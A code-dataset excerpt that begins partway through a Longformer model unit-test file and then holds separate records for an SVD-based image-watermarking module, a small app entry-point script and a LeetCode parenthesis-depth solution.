result = model(input_ids, global_attention_mask=global_attention_mask)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
self.parent.assertEqual(result.pooler_output.shape, (self.batch_size, self.hidden_size))
def create_and_check_longformer_for_masked_lm(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = LongformerForMaskedLM(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, labels=token_labels)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_longformer_for_question_answering(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = LongformerForQuestionAnswering(config=config)
model.to(torch_device)
model.eval()
result = model(
input_ids,
attention_mask=input_mask,
global_attention_mask=input_mask,
token_type_ids=token_type_ids,
start_positions=sequence_labels,
end_positions=sequence_labels,
)
self.parent.assertEqual(result.start_logits.shape, (self.batch_size, self.seq_length))
self.parent.assertEqual(result.end_logits.shape, (self.batch_size, self.seq_length))
def create_and_check_longformer_for_sequence_classification(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
config.num_labels = self.num_labels
model = LongformerForSequenceClassification(config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, labels=sequence_labels)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))
def create_and_check_longformer_for_token_classification(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
config.num_labels = self.num_labels
model = LongformerForTokenClassification(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, labels=token_labels)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.num_labels))
def create_and_check_longformer_for_multiple_choice(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
config.num_choices = self.num_choices
model = LongformerForMultipleChoice(config=config)
model.to(torch_device)
model.eval()
multiple_choice_inputs_ids = input_ids.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()
multiple_choice_token_type_ids = token_type_ids.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()
multiple_choice_input_mask = input_mask.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()
multiple_choice_input_mask = input_mask.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()
result = model(
multiple_choice_inputs_ids,
attention_mask=multiple_choice_input_mask,
global_attention_mask=multiple_choice_input_mask,
token_type_ids=multiple_choice_token_type_ids,
labels=choice_labels,
)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_choices))
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
(
config,
input_ids,
token_type_ids,
input_mask,
sequence_labels,
token_labels,
choice_labels,
) = config_and_inputs
global_attention_mask = torch.zeros_like(input_ids)
inputs_dict = {
"input_ids": input_ids,
"token_type_ids": token_type_ids,
"attention_mask": input_mask,
"global_attention_mask": global_attention_mask,
}
return config, inputs_dict
def prepare_config_and_inputs_for_question_answering(self):
config_and_inputs = self.prepare_config_and_inputs()
(
config,
input_ids,
token_type_ids,
input_mask,
sequence_labels,
token_labels,
choice_labels,
) = config_and_inputs
# Replace sep_token_id by some random id
input_ids[input_ids == config.sep_token_id] = torch.randint(0, config.vocab_size, (1,)).item()
# Make sure there are exactly three sep_token_id
input_ids[:, -3:] = config.sep_token_id
input_mask = torch.ones_like(input_ids)
return config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
@require_torch
class LongformerModelTest(ModelTesterMixin, unittest.TestCase):
test_pruning = False # pruning is not supported
test_headmasking = False # head masking is not supported
test_torchscript = False
all_model_classes = (
(
LongformerModel,
LongformerForMaskedLM,
LongformerForSequenceClassification,
LongformerForQuestionAnswering,
LongformerForTokenClassification,
LongformerForMultipleChoice,
)
if is_torch_available()
else ()
)
def setUp(self):
self.model_tester = LongformerModelTester(self)
self.config_tester = ConfigTester(self, config_class=LongformerConfig, hidden_size=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_longformer_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_longformer_model(*config_and_inputs)
def test_longformer_model_attention_mask_determinism(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_attention_mask_determinism(*config_and_inputs)
def test_longformer_model_global_attention_mask(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_longformer_model_with_global_attention_mask(*config_and_inputs)
def test_longformer_for_masked_lm(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_longformer_for_masked_lm(*config_and_inputs)
def test_longformer_for_question_answering(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs_for_question_answering()
self.model_tester.create_and_check_longformer_for_question_answering(*config_and_inputs)
def test_for_sequence_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_longformer_for_sequence_classification(*config_and_inputs)
def test_for_token_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_longformer_for_token_classification(*config_and_inputs)
def test_for_multiple_choice(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_longformer_for_multiple_choice(*config_and_inputs)
@require_torch
@require_sentencepiece
@require_tokenizers
class LongformerModelIntegrationTest(unittest.TestCase):
def _get_hidden_states(self):
return torch.tensor(
[
[
[
4.98332758e-01,
2.69175139e00,
-7.08081422e-03,
1.04915401e00,
-1.83476661e00,
7.67220476e-01,
2.98580543e-01,
2.84803992e-02,
],
[
-7.58357372e-01,
4.20635998e-01,
-4.04739919e-02,
1.59924145e-01,
2.05135748e00,
-1.15997978e00,
5.37166397e-01,
2.62873606e-01,
],
[
-1.69438001e00,
4.17574660e-01,
-1.49196962e00,
-1.76483717e00,
-1.94566312e-01,
-1.71183858e00,
7.72903565e-01,
-1.11557056e00,
],
[
5.44028163e-01,
2.05466114e-01,
-3.63045868e-01,
2.41865062e-01,
3.20348382e-01,
-9.05611176e-01,
-1.92690727e-01,
-1.19917547e00,
],
]
],
dtype=torch.float32,
device=torch_device,
)
def test_diagonalize(self):
hidden_states = self._get_hidden_states()
hidden_states = hidden_states.reshape((1, 8, 4)) # set seq length = 8, hidden dim = 4
chunked_hidden_states = LongformerSelfAttention._chunk(hidden_states, window_overlap=2)
window_overlap_size = chunked_hidden_states.shape[2]
self.assertTrue(window_overlap_size == 4)
padded_hidden_states = LongformerSelfAttention._pad_and_diagonalize(chunked_hidden_states)
self.assertTrue(padded_hidden_states.shape[-1] == chunked_hidden_states.shape[-1] + window_overlap_size - 1)
# first row => [0.4983, 2.6918, -0.0071, 1.0492, 0.0000, 0.0000, 0.0000]
self.assertTrue(torch.allclose(padded_hidden_states[0, 0, 0, :4], chunked_hidden_states[0, 0, 0], atol=1e-3))
self.assertTrue(
torch.allclose(
padded_hidden_states[0, 0, 0, 4:],
torch.zeros((3,), device=torch_device, dtype=torch.float32),
atol=1e-3,
)
)
# last row => [0.0000, 0.0000, 0.0000, 2.0514, -1.1600, 0.5372, 0.2629]
self.assertTrue(torch.allclose(padded_hidden_states[0, 0, -1, 3:], chunked_hidden_states[0, 0, -1], atol=1e-3))
self.assertTrue(
torch.allclose(
padded_hidden_states[0, 0, -1, :3],
torch.zeros((3,), device=torch_device, dtype=torch.float32),
atol=1e-3,
)
)
def test_pad_and_transpose_last_two_dims(self):
hidden_states = self._get_hidden_states()
self.assertTrue(hidden_states.shape, (1, 8, 4))
padding = (0, 0, 0, 1)
padded_hidden_states = LongformerSelfAttention._pad_and_transpose_last_two_dims(hidden_states, padding)
self.assertTrue(padded_hidden_states.shape, (1, 8, 5))
expected_added_dim = torch.zeros((5,), device=torch_device, dtype=torch.float32)
self.assertTrue(torch.allclose(expected_added_dim, padded_hidden_states[0, -1, :], atol=1e-6))
self.assertTrue(torch.allclose(hidden_states[0, -1, :], padded_hidden_states.view(1, -1)[0, 24:32], atol=1e-6))
def test_chunk(self):
hidden_states = self._get_hidden_states()
batch_size = 1
seq_length = 8
hidden_size = 4
hidden_states = hidden_states.reshape((batch_size, seq_length, hidden_size))
chunked_hidden_states = LongformerSelfAttention._chunk(hidden_states, window_overlap=2)
# expected slices across chunk and seq length dim
expected_slice_along_seq_length = torch.tensor(
[0.4983, -0.7584, -1.6944], device=torch_device, dtype=torch.float32
)
expected_slice_along_chunk = torch.tensor(
[0.4983, -1.8348, -0.7584, 2.0514], device=torch_device, dtype=torch.float32
)
self.assertTrue(torch.allclose(chunked_hidden_states[0, :, 0, 0], expected_slice_along_seq_length, atol=1e-3))
self.assertTrue(torch.allclose(chunked_hidden_states[0, 0, :, 0], expected_slice_along_chunk, atol=1e-3))
self.assertTrue(chunked_hidden_states.shape, (1, 3, 4, 4))
def test_mask_invalid_locations(self):
hidden_states = self._get_hidden_states()
batch_size = 1
seq_length = 8
hidden_size = 4
hidden_states = hidden_states.reshape((batch_size, seq_length, hidden_size))
chunked_hidden_states = LongformerSelfAttention._chunk(hidden_states, window_overlap=2)
hid_states_1 = chunked_hidden_states.clone()
LongformerSelfAttention._mask_invalid_locations(hid_states_1, 1)
self.assertTrue(torch.isinf(hid_states_1).sum().item() == 8)
hid_states_2 = chunked_hidden_states.clone()
LongformerSelfAttention._mask_invalid_locations(hid_states_2, 2)
self.assertTrue(torch.isinf(hid_states_2).sum().item() == 24)
hid_states_3 = chunked_hidden_states.clone()[:, :, :, :3]
LongformerSelfAttention._mask_invalid_locations(hid_states_3, 2)
self.assertTrue(torch.isinf(hid_states_3).sum().item() == 24)
hid_states_4 = chunked_hidden_states.clone()[:, :, 2:, :]
LongformerSelfAttention._mask_invalid_locations(hid_states_4, 2)
self.assertTrue(torch.isinf(hid_states_4).sum().item() == 12)
def test_layer_local_attn(self):
model = LongformerModel.from_pretrained("patrickvonplaten/longformer-random-tiny")
model.eval()
layer = model.encoder.layer[0].attention.self.to(torch_device)
hidden_states = self._get_hidden_states()
batch_size, seq_length, hidden_size = hidden_states.size()
attention_mask = torch.zeros((batch_size, seq_length), dtype=torch.float32, device=torch_device)
attention_mask[:, -2:] = -10000
is_index_masked = attention_mask < 0
is_index_global_attn = attention_mask > 0
is_global_attn = is_index_global_attn.flatten().any().item()
output_hidden_states, _ = layer(
hidden_states,
attention_mask=attention_mask,
is_index_masked=is_index_masked,
is_index_global_attn=is_index_global_attn,
is_global_attn=is_global_attn,
)
self.assertTrue(output_hidden_states.shape, (1, 4, 8))
self.assertTrue(
torch.allclose(
output_hidden_states[0, 1],
torch.tensor(
[0.0019, 0.0122, -0.0171, -0.0256, -0.0300, 0.0173, -0.0115, 0.0048],
dtype=torch.float32,
device=torch_device,
),
atol=1e-3,
)
)
def test_layer_global_attn(self):
model = LongformerModel.from_pretrained("patrickvonplaten/longformer-random-tiny")
model.eval()
layer = model.encoder.layer[0].attention.self.to(torch_device)
hidden_states = torch.cat([self._get_hidden_states(), self._get_hidden_states() - 0.5], dim=0)
batch_size, seq_length, hidden_size = hidden_states.size()
attention_mask = torch.zeros((batch_size, seq_length), dtype=torch.float32, device=torch_device)
# create attn mask
attention_mask[0, -2:] = 10000.0
attention_mask[0, -1:] = -10000.0
attention_mask[1, 1:] = 10000.0
is_index_masked = attention_mask < 0
is_index_global_attn = attention_mask > 0
is_global_attn = is_index_global_attn.flatten().any().item()
output_hidden_states, _, _ = layer(
hidden_states,
attention_mask=attention_mask,
is_index_masked=is_index_masked,
is_index_global_attn=is_index_global_attn,
is_global_attn=is_global_attn,
)
self.assertTrue(output_hidden_states.shape, (2, 4, 8))
self.assertTrue(
torch.allclose(
output_hidden_states[0, 2],
torch.tensor(
[-0.0651, -0.0393, 0.0309, -0.0342, -0.0066, -0.0155, -0.0209, -0.0494],
dtype=torch.float32,
device=torch_device,
),
atol=1e-3,
)
)
self.assertTrue(
torch.allclose(
output_hidden_states[1, -2],
torch.tensor(
[-0.0405, -0.0384, 0.0396, -0.0374, -0.0341, 0.0136, 0.0014, -0.0571],
dtype=torch.float32,
device=torch_device,
),
atol=1e-3,
)
)
def test_layer_attn_probs(self):
model = LongformerModel.from_pretrained("patrickvonplaten/longformer-random-tiny")
model.eval()
layer = model.encoder.layer[0].attention.self.to(torch_device)
hidden_states = torch.cat([self._get_hidden_states(), self._get_hidden_states() - 0.5], dim=0)
batch_size, seq_length, hidden_size = hidden_states.size()
attention_mask = torch.zeros((batch_size, seq_length), dtype=torch.float32, device=torch_device)
# create attn mask
attention_mask[0, -2:] = 10000.0
attention_mask[0, -1:] = -10000.0
attention_mask[1, 1:] = 10000.0
is_index_masked = attention_mask < 0
is_index_global_attn = attention_mask > 0
is_global_attn = is_index_global_attn.flatten().any().item()
output_hidden_states, local_attentions, global_attentions = layer(
hidden_states,
attention_mask=attention_mask,
is_index_masked=is_index_masked,
is_index_global_attn=is_index_global_attn,
is_global_attn=is_global_attn,
)
self.assertEqual(local_attentions.shape, (2, 4, 2, 8))
self.assertEqual(global_attentions.shape, (2, 2, 3, 4))
# All tokens with global attention have weight 0 in local attentions.
self.assertTrue(torch.all(local_attentions[0, 2:4, :, :] == 0))
self.assertTrue(torch.all(local_attentions[1, 1:4, :, :] == 0))
# The weight of all tokens with local attention must sum to 1.
self.assertTrue(torch.all(torch.abs(global_attentions[0, :, :2, :].sum(dim=-1) - 1) < 1e-6))
self.assertTrue(torch.all(torch.abs(global_attentions[1, :, :1, :].sum(dim=-1) - 1) < 1e-6))
self.assertTrue(
torch.allclose(
local_attentions[0, 0, 0, :],
torch.tensor(
[0.3328, 0.0000, 0.0000, 0.0000, 0.0000, 0.3355, 0.3318, 0.0000],
dtype=torch.float32,
device=torch_device,
),
atol=1e-3,
)
)
self.assertTrue(
torch.allclose(
local_attentions[1, 0, 0, :],
torch.tensor(
[0.2492, 0.2502, 0.2502, 0.0000, 0.0000, 0.2505, 0.0000, 0.0000],
dtype=torch.float32,
device=torch_device,
),
atol=1e-3,
)
)
# All the global attention weights must sum to 1.
self.assertTrue(torch.all(torch.abs(global_attentions.sum(dim=-1) - 1) < 1e-6))
self.assertTrue(
torch.allclose(
global_attentions[0, 0, 1, :],
torch.tensor(
[0.2500, 0.2500, 0.2500, 0.2500],
dtype=torch.float32,
device=torch_device,
),
atol=1e-3,
)
)
self.assertTrue(
torch.allclose(
global_attentions[1, 0, 0, :],
torch.tensor(
[0.2497, 0.2500, 0.2499, 0.2504],
dtype=torch.float32,
device=torch_device,
),
atol=1e-3,
)
)
@slow
def test_inference_no_head(self):
model = LongformerModel.from_pretrained("allenai/longformer-base-4096")
model.to(torch_device)
# 'Hello world!'
input_ids = torch.tensor([[0, 20920, 232, 328, 1437, 2]], dtype=torch.long, device=torch_device)
attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=torch_device)
output = model(input_ids, attention_mask=attention_mask)[0]
output_without_mask = model(input_ids)[0]
expected_output_slice = torch.tensor([0.0549, 0.1087, -0.1119, -0.0368, 0.0250], device=torch_device)
self.assertTrue(torch.allclose(output[0, 0, -5:], expected_output_slice, atol=1e-4))
self.assertTrue(torch.allclose(output_without_mask[0, 0, -5:], expected_output_slice, atol=1e-4))
@slow
def test_inference_no_head_long(self):
model = LongformerModel.from_pretrained("allenai/longformer-base-4096")
model.to(torch_device)
# 'Hello world! ' repeated 1000 times
input_ids = torch.tensor(
[[0] + [20920, 232, 328, 1437] * 1000 + [2]], dtype=torch.long, device=torch_device
) # long input
attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=input_ids.device)
global_attention_mask = torch.zeros(input_ids.shape, dtype=torch.long, device=input_ids.device)
global_attention_mask[:, [1, 4, 21]] = 1 # Set global attention on a few random positions
output = model(input_ids, attention_mask=attention_mask, global_attention_mask=global_attention_mask)[0]
expected_output_sum = torch.tensor(74585.8594, device=torch_device)
expected_output_mean = torch.tensor(0.0243, device=torch_device)
self.assertTrue(torch.allclose(output.sum(), expected_output_sum, atol=1e-4))
self.assertTrue(torch.allclose(output.mean(), expected_output_mean, atol=1e-4))
@slow
def test_inference_masked_lm_long(self):
model = LongformerForMaskedLM.from_pretrained("allenai/longformer-base-4096")
model.to(torch_device)
# 'Hello world! ' repeated 1000 times
input_ids = torch.tensor(
[[0] + [20920, 232, 328, 1437] * 1000 + [2]], dtype=torch.long, device=torch_device
) # long input
input_ids = input_ids.to(torch_device)
loss, prediction_scores = model(input_ids, labels=input_ids)
expected_loss = torch.tensor(0.0074, device=torch_device)
expected_prediction_scores_sum = torch.tensor(-6.1048e08, device=torch_device)
expected_prediction_scores_mean = torch.tensor(-3.0348, device=torch_device)
self.assertTrue(torch.allclose(loss, expected_loss, atol=1e-4))
self.assertTrue(torch.allclose(prediction_scores.sum(), expected_prediction_scores_sum, atol=1e-4))
self.assertTrue(torch.allclose(prediction_scores.mean(), expected_prediction_scores_mean, atol=1e-4))
| 42.850852 | 119 | 0.647462 |
74501855c5927294d55f392a675088ba65caa086 | 8,890 | py | Python | david/watermark.py | S-I-SVD/Randomized-SVD | 82108238a53c70938af87417f98aadc7f74b2a87 | [
"MIT"
] | 1 | 2021-12-09T13:34:44.000Z | 2021-12-09T13:34:44.000Z | david/watermark.py | S-I-SVD/Randomized-SVD | 82108238a53c70938af87417f98aadc7f74b2a87 | [
"MIT"
] | null | null | null | david/watermark.py | S-I-SVD/Randomized-SVD | 82108238a53c70938af87417f98aadc7f74b2a87 | [
"MIT"
] | null | null | null | import numpy as np
import numpy.linalg as la
import matplotlib.pyplot as plt
import svd_tools as svdt
import scipy as sp
import scipy.sparse
from PIL import Image
'''
Embed a watermark in using the Liu & Tan algorithm
'''
def embed_watermark_liutan(mat, watermark, scale=1):
'''
Embed a watermark in a matrix using the Liu & Tan watermarking scheme.
Corresponds to Algorithm 2.2 in the paper.
Args:
img: The matrix in which to embed the watemark (A in Algorithm 2.2)
watermark: The watermark to embed in the matrix (W in Algorithm 2.2)
scale: Scaling factor (alpha in Algorithm 2.2)
Returns: (A_W, U_W, S, (V_W)^T) (corresponding to the symbols in Algorithm 2.2)
'''
mat_rows, mat_columns = mat.shape
watermark_rows, watermark_columns = watermark.shape
if mat_rows < watermark_rows or mat_columns < watermark_columns:
print('Watermark must be smaller than matrix')
return
mat_u, mat_s, mat_vh = la.svd(mat)
mat_num_sv = len(mat_s)
# Compute the rectangular "diagonal" singular value matrix
mat_s_matrix = np.pad(np.diag(mat_s),
[(0, mat_rows - mat_num_sv), (0, mat_columns - mat_num_sv)])
watermark_padded = np.pad(watermark,
[(0, mat_rows - watermark_rows), (0, mat_columns - watermark_columns)])
mat_s_matrix_watermarked = mat_s_matrix + scale * watermark_padded
watermarked_u, watermarked_s, watermarked_vh = la.svd(mat_s_matrix_watermarked)
watermarked_num_sv = len(watermarked_s)
watermarked_s_matrix = np.pad(np.diag(watermarked_s),
[(0, mat_rows - watermarked_num_sv), (0, mat_columns - watermarked_num_sv)])
mat_watermarked = mat_u @ watermarked_s_matrix @ mat_vh
return mat_watermarked, watermarked_u, mat_s_matrix, watermarked_vh
embed_watermark = embed_watermark_liutan
def extract_watermark_liutan(mat_watermarked, watermarked_u, mat_s_matrix, watermarked_vh, scale):
'''
Extact a watermark from a matrix using the Liu & Tan watermarking scheme.
Corresponds to Algorithm 2.3 in the paper.
Args:
mat_watermarked: The watermarked matrix (\widetilde{A}_W in Algorithm 2.3)
watermarked_u: U_W from Algorithm 2.3 (watermarked_u from the return statement of the function embed_watermark_liutan)
mat_s_matrix: Singular value matrix of the original unwatermarked matrix (S from Algorithm 2.2/2.3, mat_s_matrix from the function embed_watermark_liutan)
watermarked_vh: (V_W)^T from Algorithm 2.3 (watermarked_vh from the return statement of embed_watermark_liutan)
scale:
scale: Scaling factor (alpha in Algorithm 2.2/2.3)
Returns: The recovered image (\widetilde{W} in Algorithm 2.3)
'''
_, watermarked_s, _ = la.svd(mat_watermarked)
mat_watermarked_rows, mat_watermarked_cols = mat_watermarked.shape
num_sv = len(watermarked_s)
watermarked_s_matrix = np.pad(np.diag(watermarked_s),
[(0, mat_watermarked_rows - num_sv), (0, mat_watermarked_cols - num_sv)])
return (watermarked_u @ watermarked_s_matrix @ watermarked_vh - mat_s_matrix) / scale
extract_watermark = extract_watermark_liutan
def embed_watermark_jain(mat, watermark, scale=1, term=False):
'''
Embed a watermark in a matrix using the Jain et al watermarking scheme.
Corresponds to Algorithm 2.4 in the paper.
Args:
img: The matrix in which to embed the watemark (A in Algorithm 2.4)
watermark: The watermark to embed in the matrix (W in Algorithm 2.4)
scale: Scaling factor (alpha in Algorithm 2.4)
term: Whether or not to also return the "Jain term" (the term added to A in Equation 3.1) in addition to the watermarked matrix and the key.
Returns: (A_W, (V_W)^T, [Jain term as above if term==True]) (corresponding to the symbols in Algorithm 2.4)
'''
mat_rows, mat_columns = mat.shape
watermark_rows, watermark_columns = watermark.shape
if mat_rows < watermark_rows or mat_columns < watermark_columns:
print('Watermark must be smaller than matrix')
return
mat_u, mat_s, mat_vh = la.svd(mat)
mat_num_sv = len(mat_s)
# Compute the rectangular "diagonal" singular value matrix
mat_s_matrix = np.pad(np.diag(mat_s),
[(0, mat_rows - mat_num_sv), (0, mat_columns - mat_num_sv)])
# Pad watermark to match the sizes
watermark_padded = np.pad(watermark,
[(0, mat_rows - watermark_rows), (0, mat_columns - watermark_columns)])
watermark_u, watermark_s, watermark_vh = la.svd(watermark_padded)
watermark_num_sv = len(watermark_s)
watermark_rows, watermark_columns = mat.shape
watermark_s_matrix = np.pad(np.diag(watermark_s), [(0, watermark_rows - watermark_num_sv), (0, watermark_columns - watermark_num_sv)])
watermark_pcs = watermark_u @ watermark_s_matrix
mat_s_matrix_watermarked = mat_s_matrix + scale * watermark_pcs
mat_watermarked = mat_u @ mat_s_matrix_watermarked @ mat_vh
jain_term = mat_u @ watermark_u @ watermark_s_matrix @ mat_vh
if term:
return mat_watermarked, watermark_vh, jain_term
else:
return mat_watermarked, watermark_vh
def extract_watermark_jain(mat_watermarked, mat_original, watermark_vh, scale):
'''
Extact a watermark from a matrix using the Jain watermarking scheme.
Corresponds to Algorithm 2.5 in the paper.
Args:
mat_watermarked: The watermarked matrix (\widetilde{A}_W in Algorithm 2.5)
mat_original: The original, unwatermarked matrix (A in Algorithm 2.4/2.5)
watermark_vh: (V_W)^T from Algorithm 2.4/2.5 (watermark_vh from the return statement of embed_watermark_jain)
scale: Scaling factor (alpha in Algorithm 2.4/2.5)
Returns: The recovered image (\widetilde{W} in Algorithm 2.5)
'''
mat_u, mat_s, mat_vh = la.svd(mat_original)
#watermark_pcs = (mat_u.conj().T @ (mat_watermarked - mat_original) @ mat_vh.conj().T) / scale
watermark_pcs = (la.inv(mat_u) @ (mat_watermarked - mat_original) @ la.inv(mat_vh)) / scale
return watermark_pcs @ watermark_vh
def embed_watermark_jain_mod(mat, watermark, scale=1, term=False):
'''
Embed a watermark in a matrix using the proposed modified Jain et al watermarking scheme.
Corresponds to Algorithm 3.1 in the paper.
Args:
img: The matrix in which to embed the watemark (A in Algorithm 3.1)
watermark: The watermark to embed in the matrix (W in Algorithm 3.1)
scale: Scaling factor (alpha in Algorithm 3.1)
term: Whether or not to also return the "Jain mod term" (the term added to A in Step 3 of Algorithm 3.1) in addition to the watermarked matrix and the key.
Returns: (A_W, (V_W)^T, [Jain mod term as above if term==True]) (corresponding to the symbols in Algorithm 3.1)
'''
mat_rows, mat_columns = mat.shape
watermark_rows, watermark_columns = watermark.shape
if mat_rows < watermark_rows or mat_columns < watermark_columns:
print('Watermark must be smaller than matrix')
return
mat_u, mat_s, mat_vh = la.svd(mat)
mat_num_sv = len(mat_s)
# Compute the rectangular "diagonal" singular value matrix
mat_s_matrix = np.pad(np.diag(mat_s),
[(0, mat_rows - mat_num_sv), (0, mat_columns - mat_num_sv)])
# Pad watermark to match the sizes
watermark_padded = np.pad(watermark,
[(0, mat_rows - watermark_rows), (0, mat_columns - watermark_columns)])
watermark_u, watermark_s, watermark_vh = la.svd(watermark_padded)
watermark_num_sv = len(watermark_s)
watermark_rows, watermark_columns = mat.shape
watermark_s_matrix = np.pad(np.diag(watermark_s), [(0, watermark_rows - watermark_num_sv), (0, watermark_columns - watermark_num_sv)])
mat_watermarked = mat + scale * watermark_u @ watermark_s_matrix @ mat_vh
jain_mod_term = watermark_u @ watermark_s_matrix @ mat_vh
if term:
return mat_watermarked, watermark_vh, jain_mod_term
else:
return mat_watermarked, watermark_vh
return mat_watermarked, watermark_vh
def extract_watermark_jain_mod(mat_watermarked, mat_original, watermark_vh, scale):
'''
Extact a watermark from a matrix using the proposed modified Jain watermarking scheme.
Corresponds to Algorithm 3.1 in the paper.
Args:
mat_watermarked: The watermarked matrix (\widetilde{A}_W in Algorithm 3.1)
mat_original: The original, unwatermarked matrix (A in Algorithm 3.1/3.2)
watermark_vh: (V_W)^T from Algorithm 3.1/3.2 (watermark_vh from the return statement of embed_watermark_jain_mod)
scale: Scaling factor (alpha in Algorithm 3.1/3.2)
Returns: The recovered image (\widetilde{W} in Algorithm 3.2)
'''
mat_u, mat_s, mat_vh = la.svd(mat_original)
return (mat_watermarked - mat_original) @ la.inv(mat_vh) @ watermark_vh / scale
| 45.589744 | 163 | 0.713611 |
8e8ba19e85c168b8587f25848ffa7f4748858d55 | 264 | py | Python | hale_hub/entry_points.py | tantinlala/hale-hub | da2e6d24e3869ee533d2e272ce87b9e7eede9a79 | [
"MIT"
] | null | null | null | hale_hub/entry_points.py | tantinlala/hale-hub | da2e6d24e3869ee533d2e272ce87b9e7eede9a79 | [
"MIT"
] | null | null | null | hale_hub/entry_points.py | tantinlala/hale-hub | da2e6d24e3869ee533d2e272ce87b9e7eede9a79 | [
"MIT"
] | null | null | null | from hale_hub import create_app
from hale_hub.extensions import db
def hale_hub_run():
app = create_app()
app.run(host='0.0.0.0')
def hale_hub_setup():
app = create_app()
with app.app_context():
db.init_app(app)
db.create_all()
| 17.6 | 34 | 0.655303 |
c0831719df66f55a069b5f3626ffca4586cb1758 | 334 | py | Python | solutions/1614_maximum_nesting_depth_of_the_parentheses.py | YiqunPeng/leetcode_pro | 7e6376984f9baec49a5e827d98330fe3d1b656f0 | [
"MIT"
] | null | null | null | solutions/1614_maximum_nesting_depth_of_the_parentheses.py | YiqunPeng/leetcode_pro | 7e6376984f9baec49a5e827d98330fe3d1b656f0 | [
"MIT"
] | null | null | null | solutions/1614_maximum_nesting_depth_of_the_parentheses.py | YiqunPeng/leetcode_pro | 7e6376984f9baec49a5e827d98330fe3d1b656f0 | [
"MIT"
] | null | null | null | class Solution:
def maxDepth(self, s: str) -> int:
"""String.
Running time: O(n) where n == len(s).
"""
res = 0
n = 0
for i in s:
if i == '(':
n += 1
res = max(res, n)
elif i == ')':
n -= 1
return res
| 20.875 | 45 | 0.323353 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.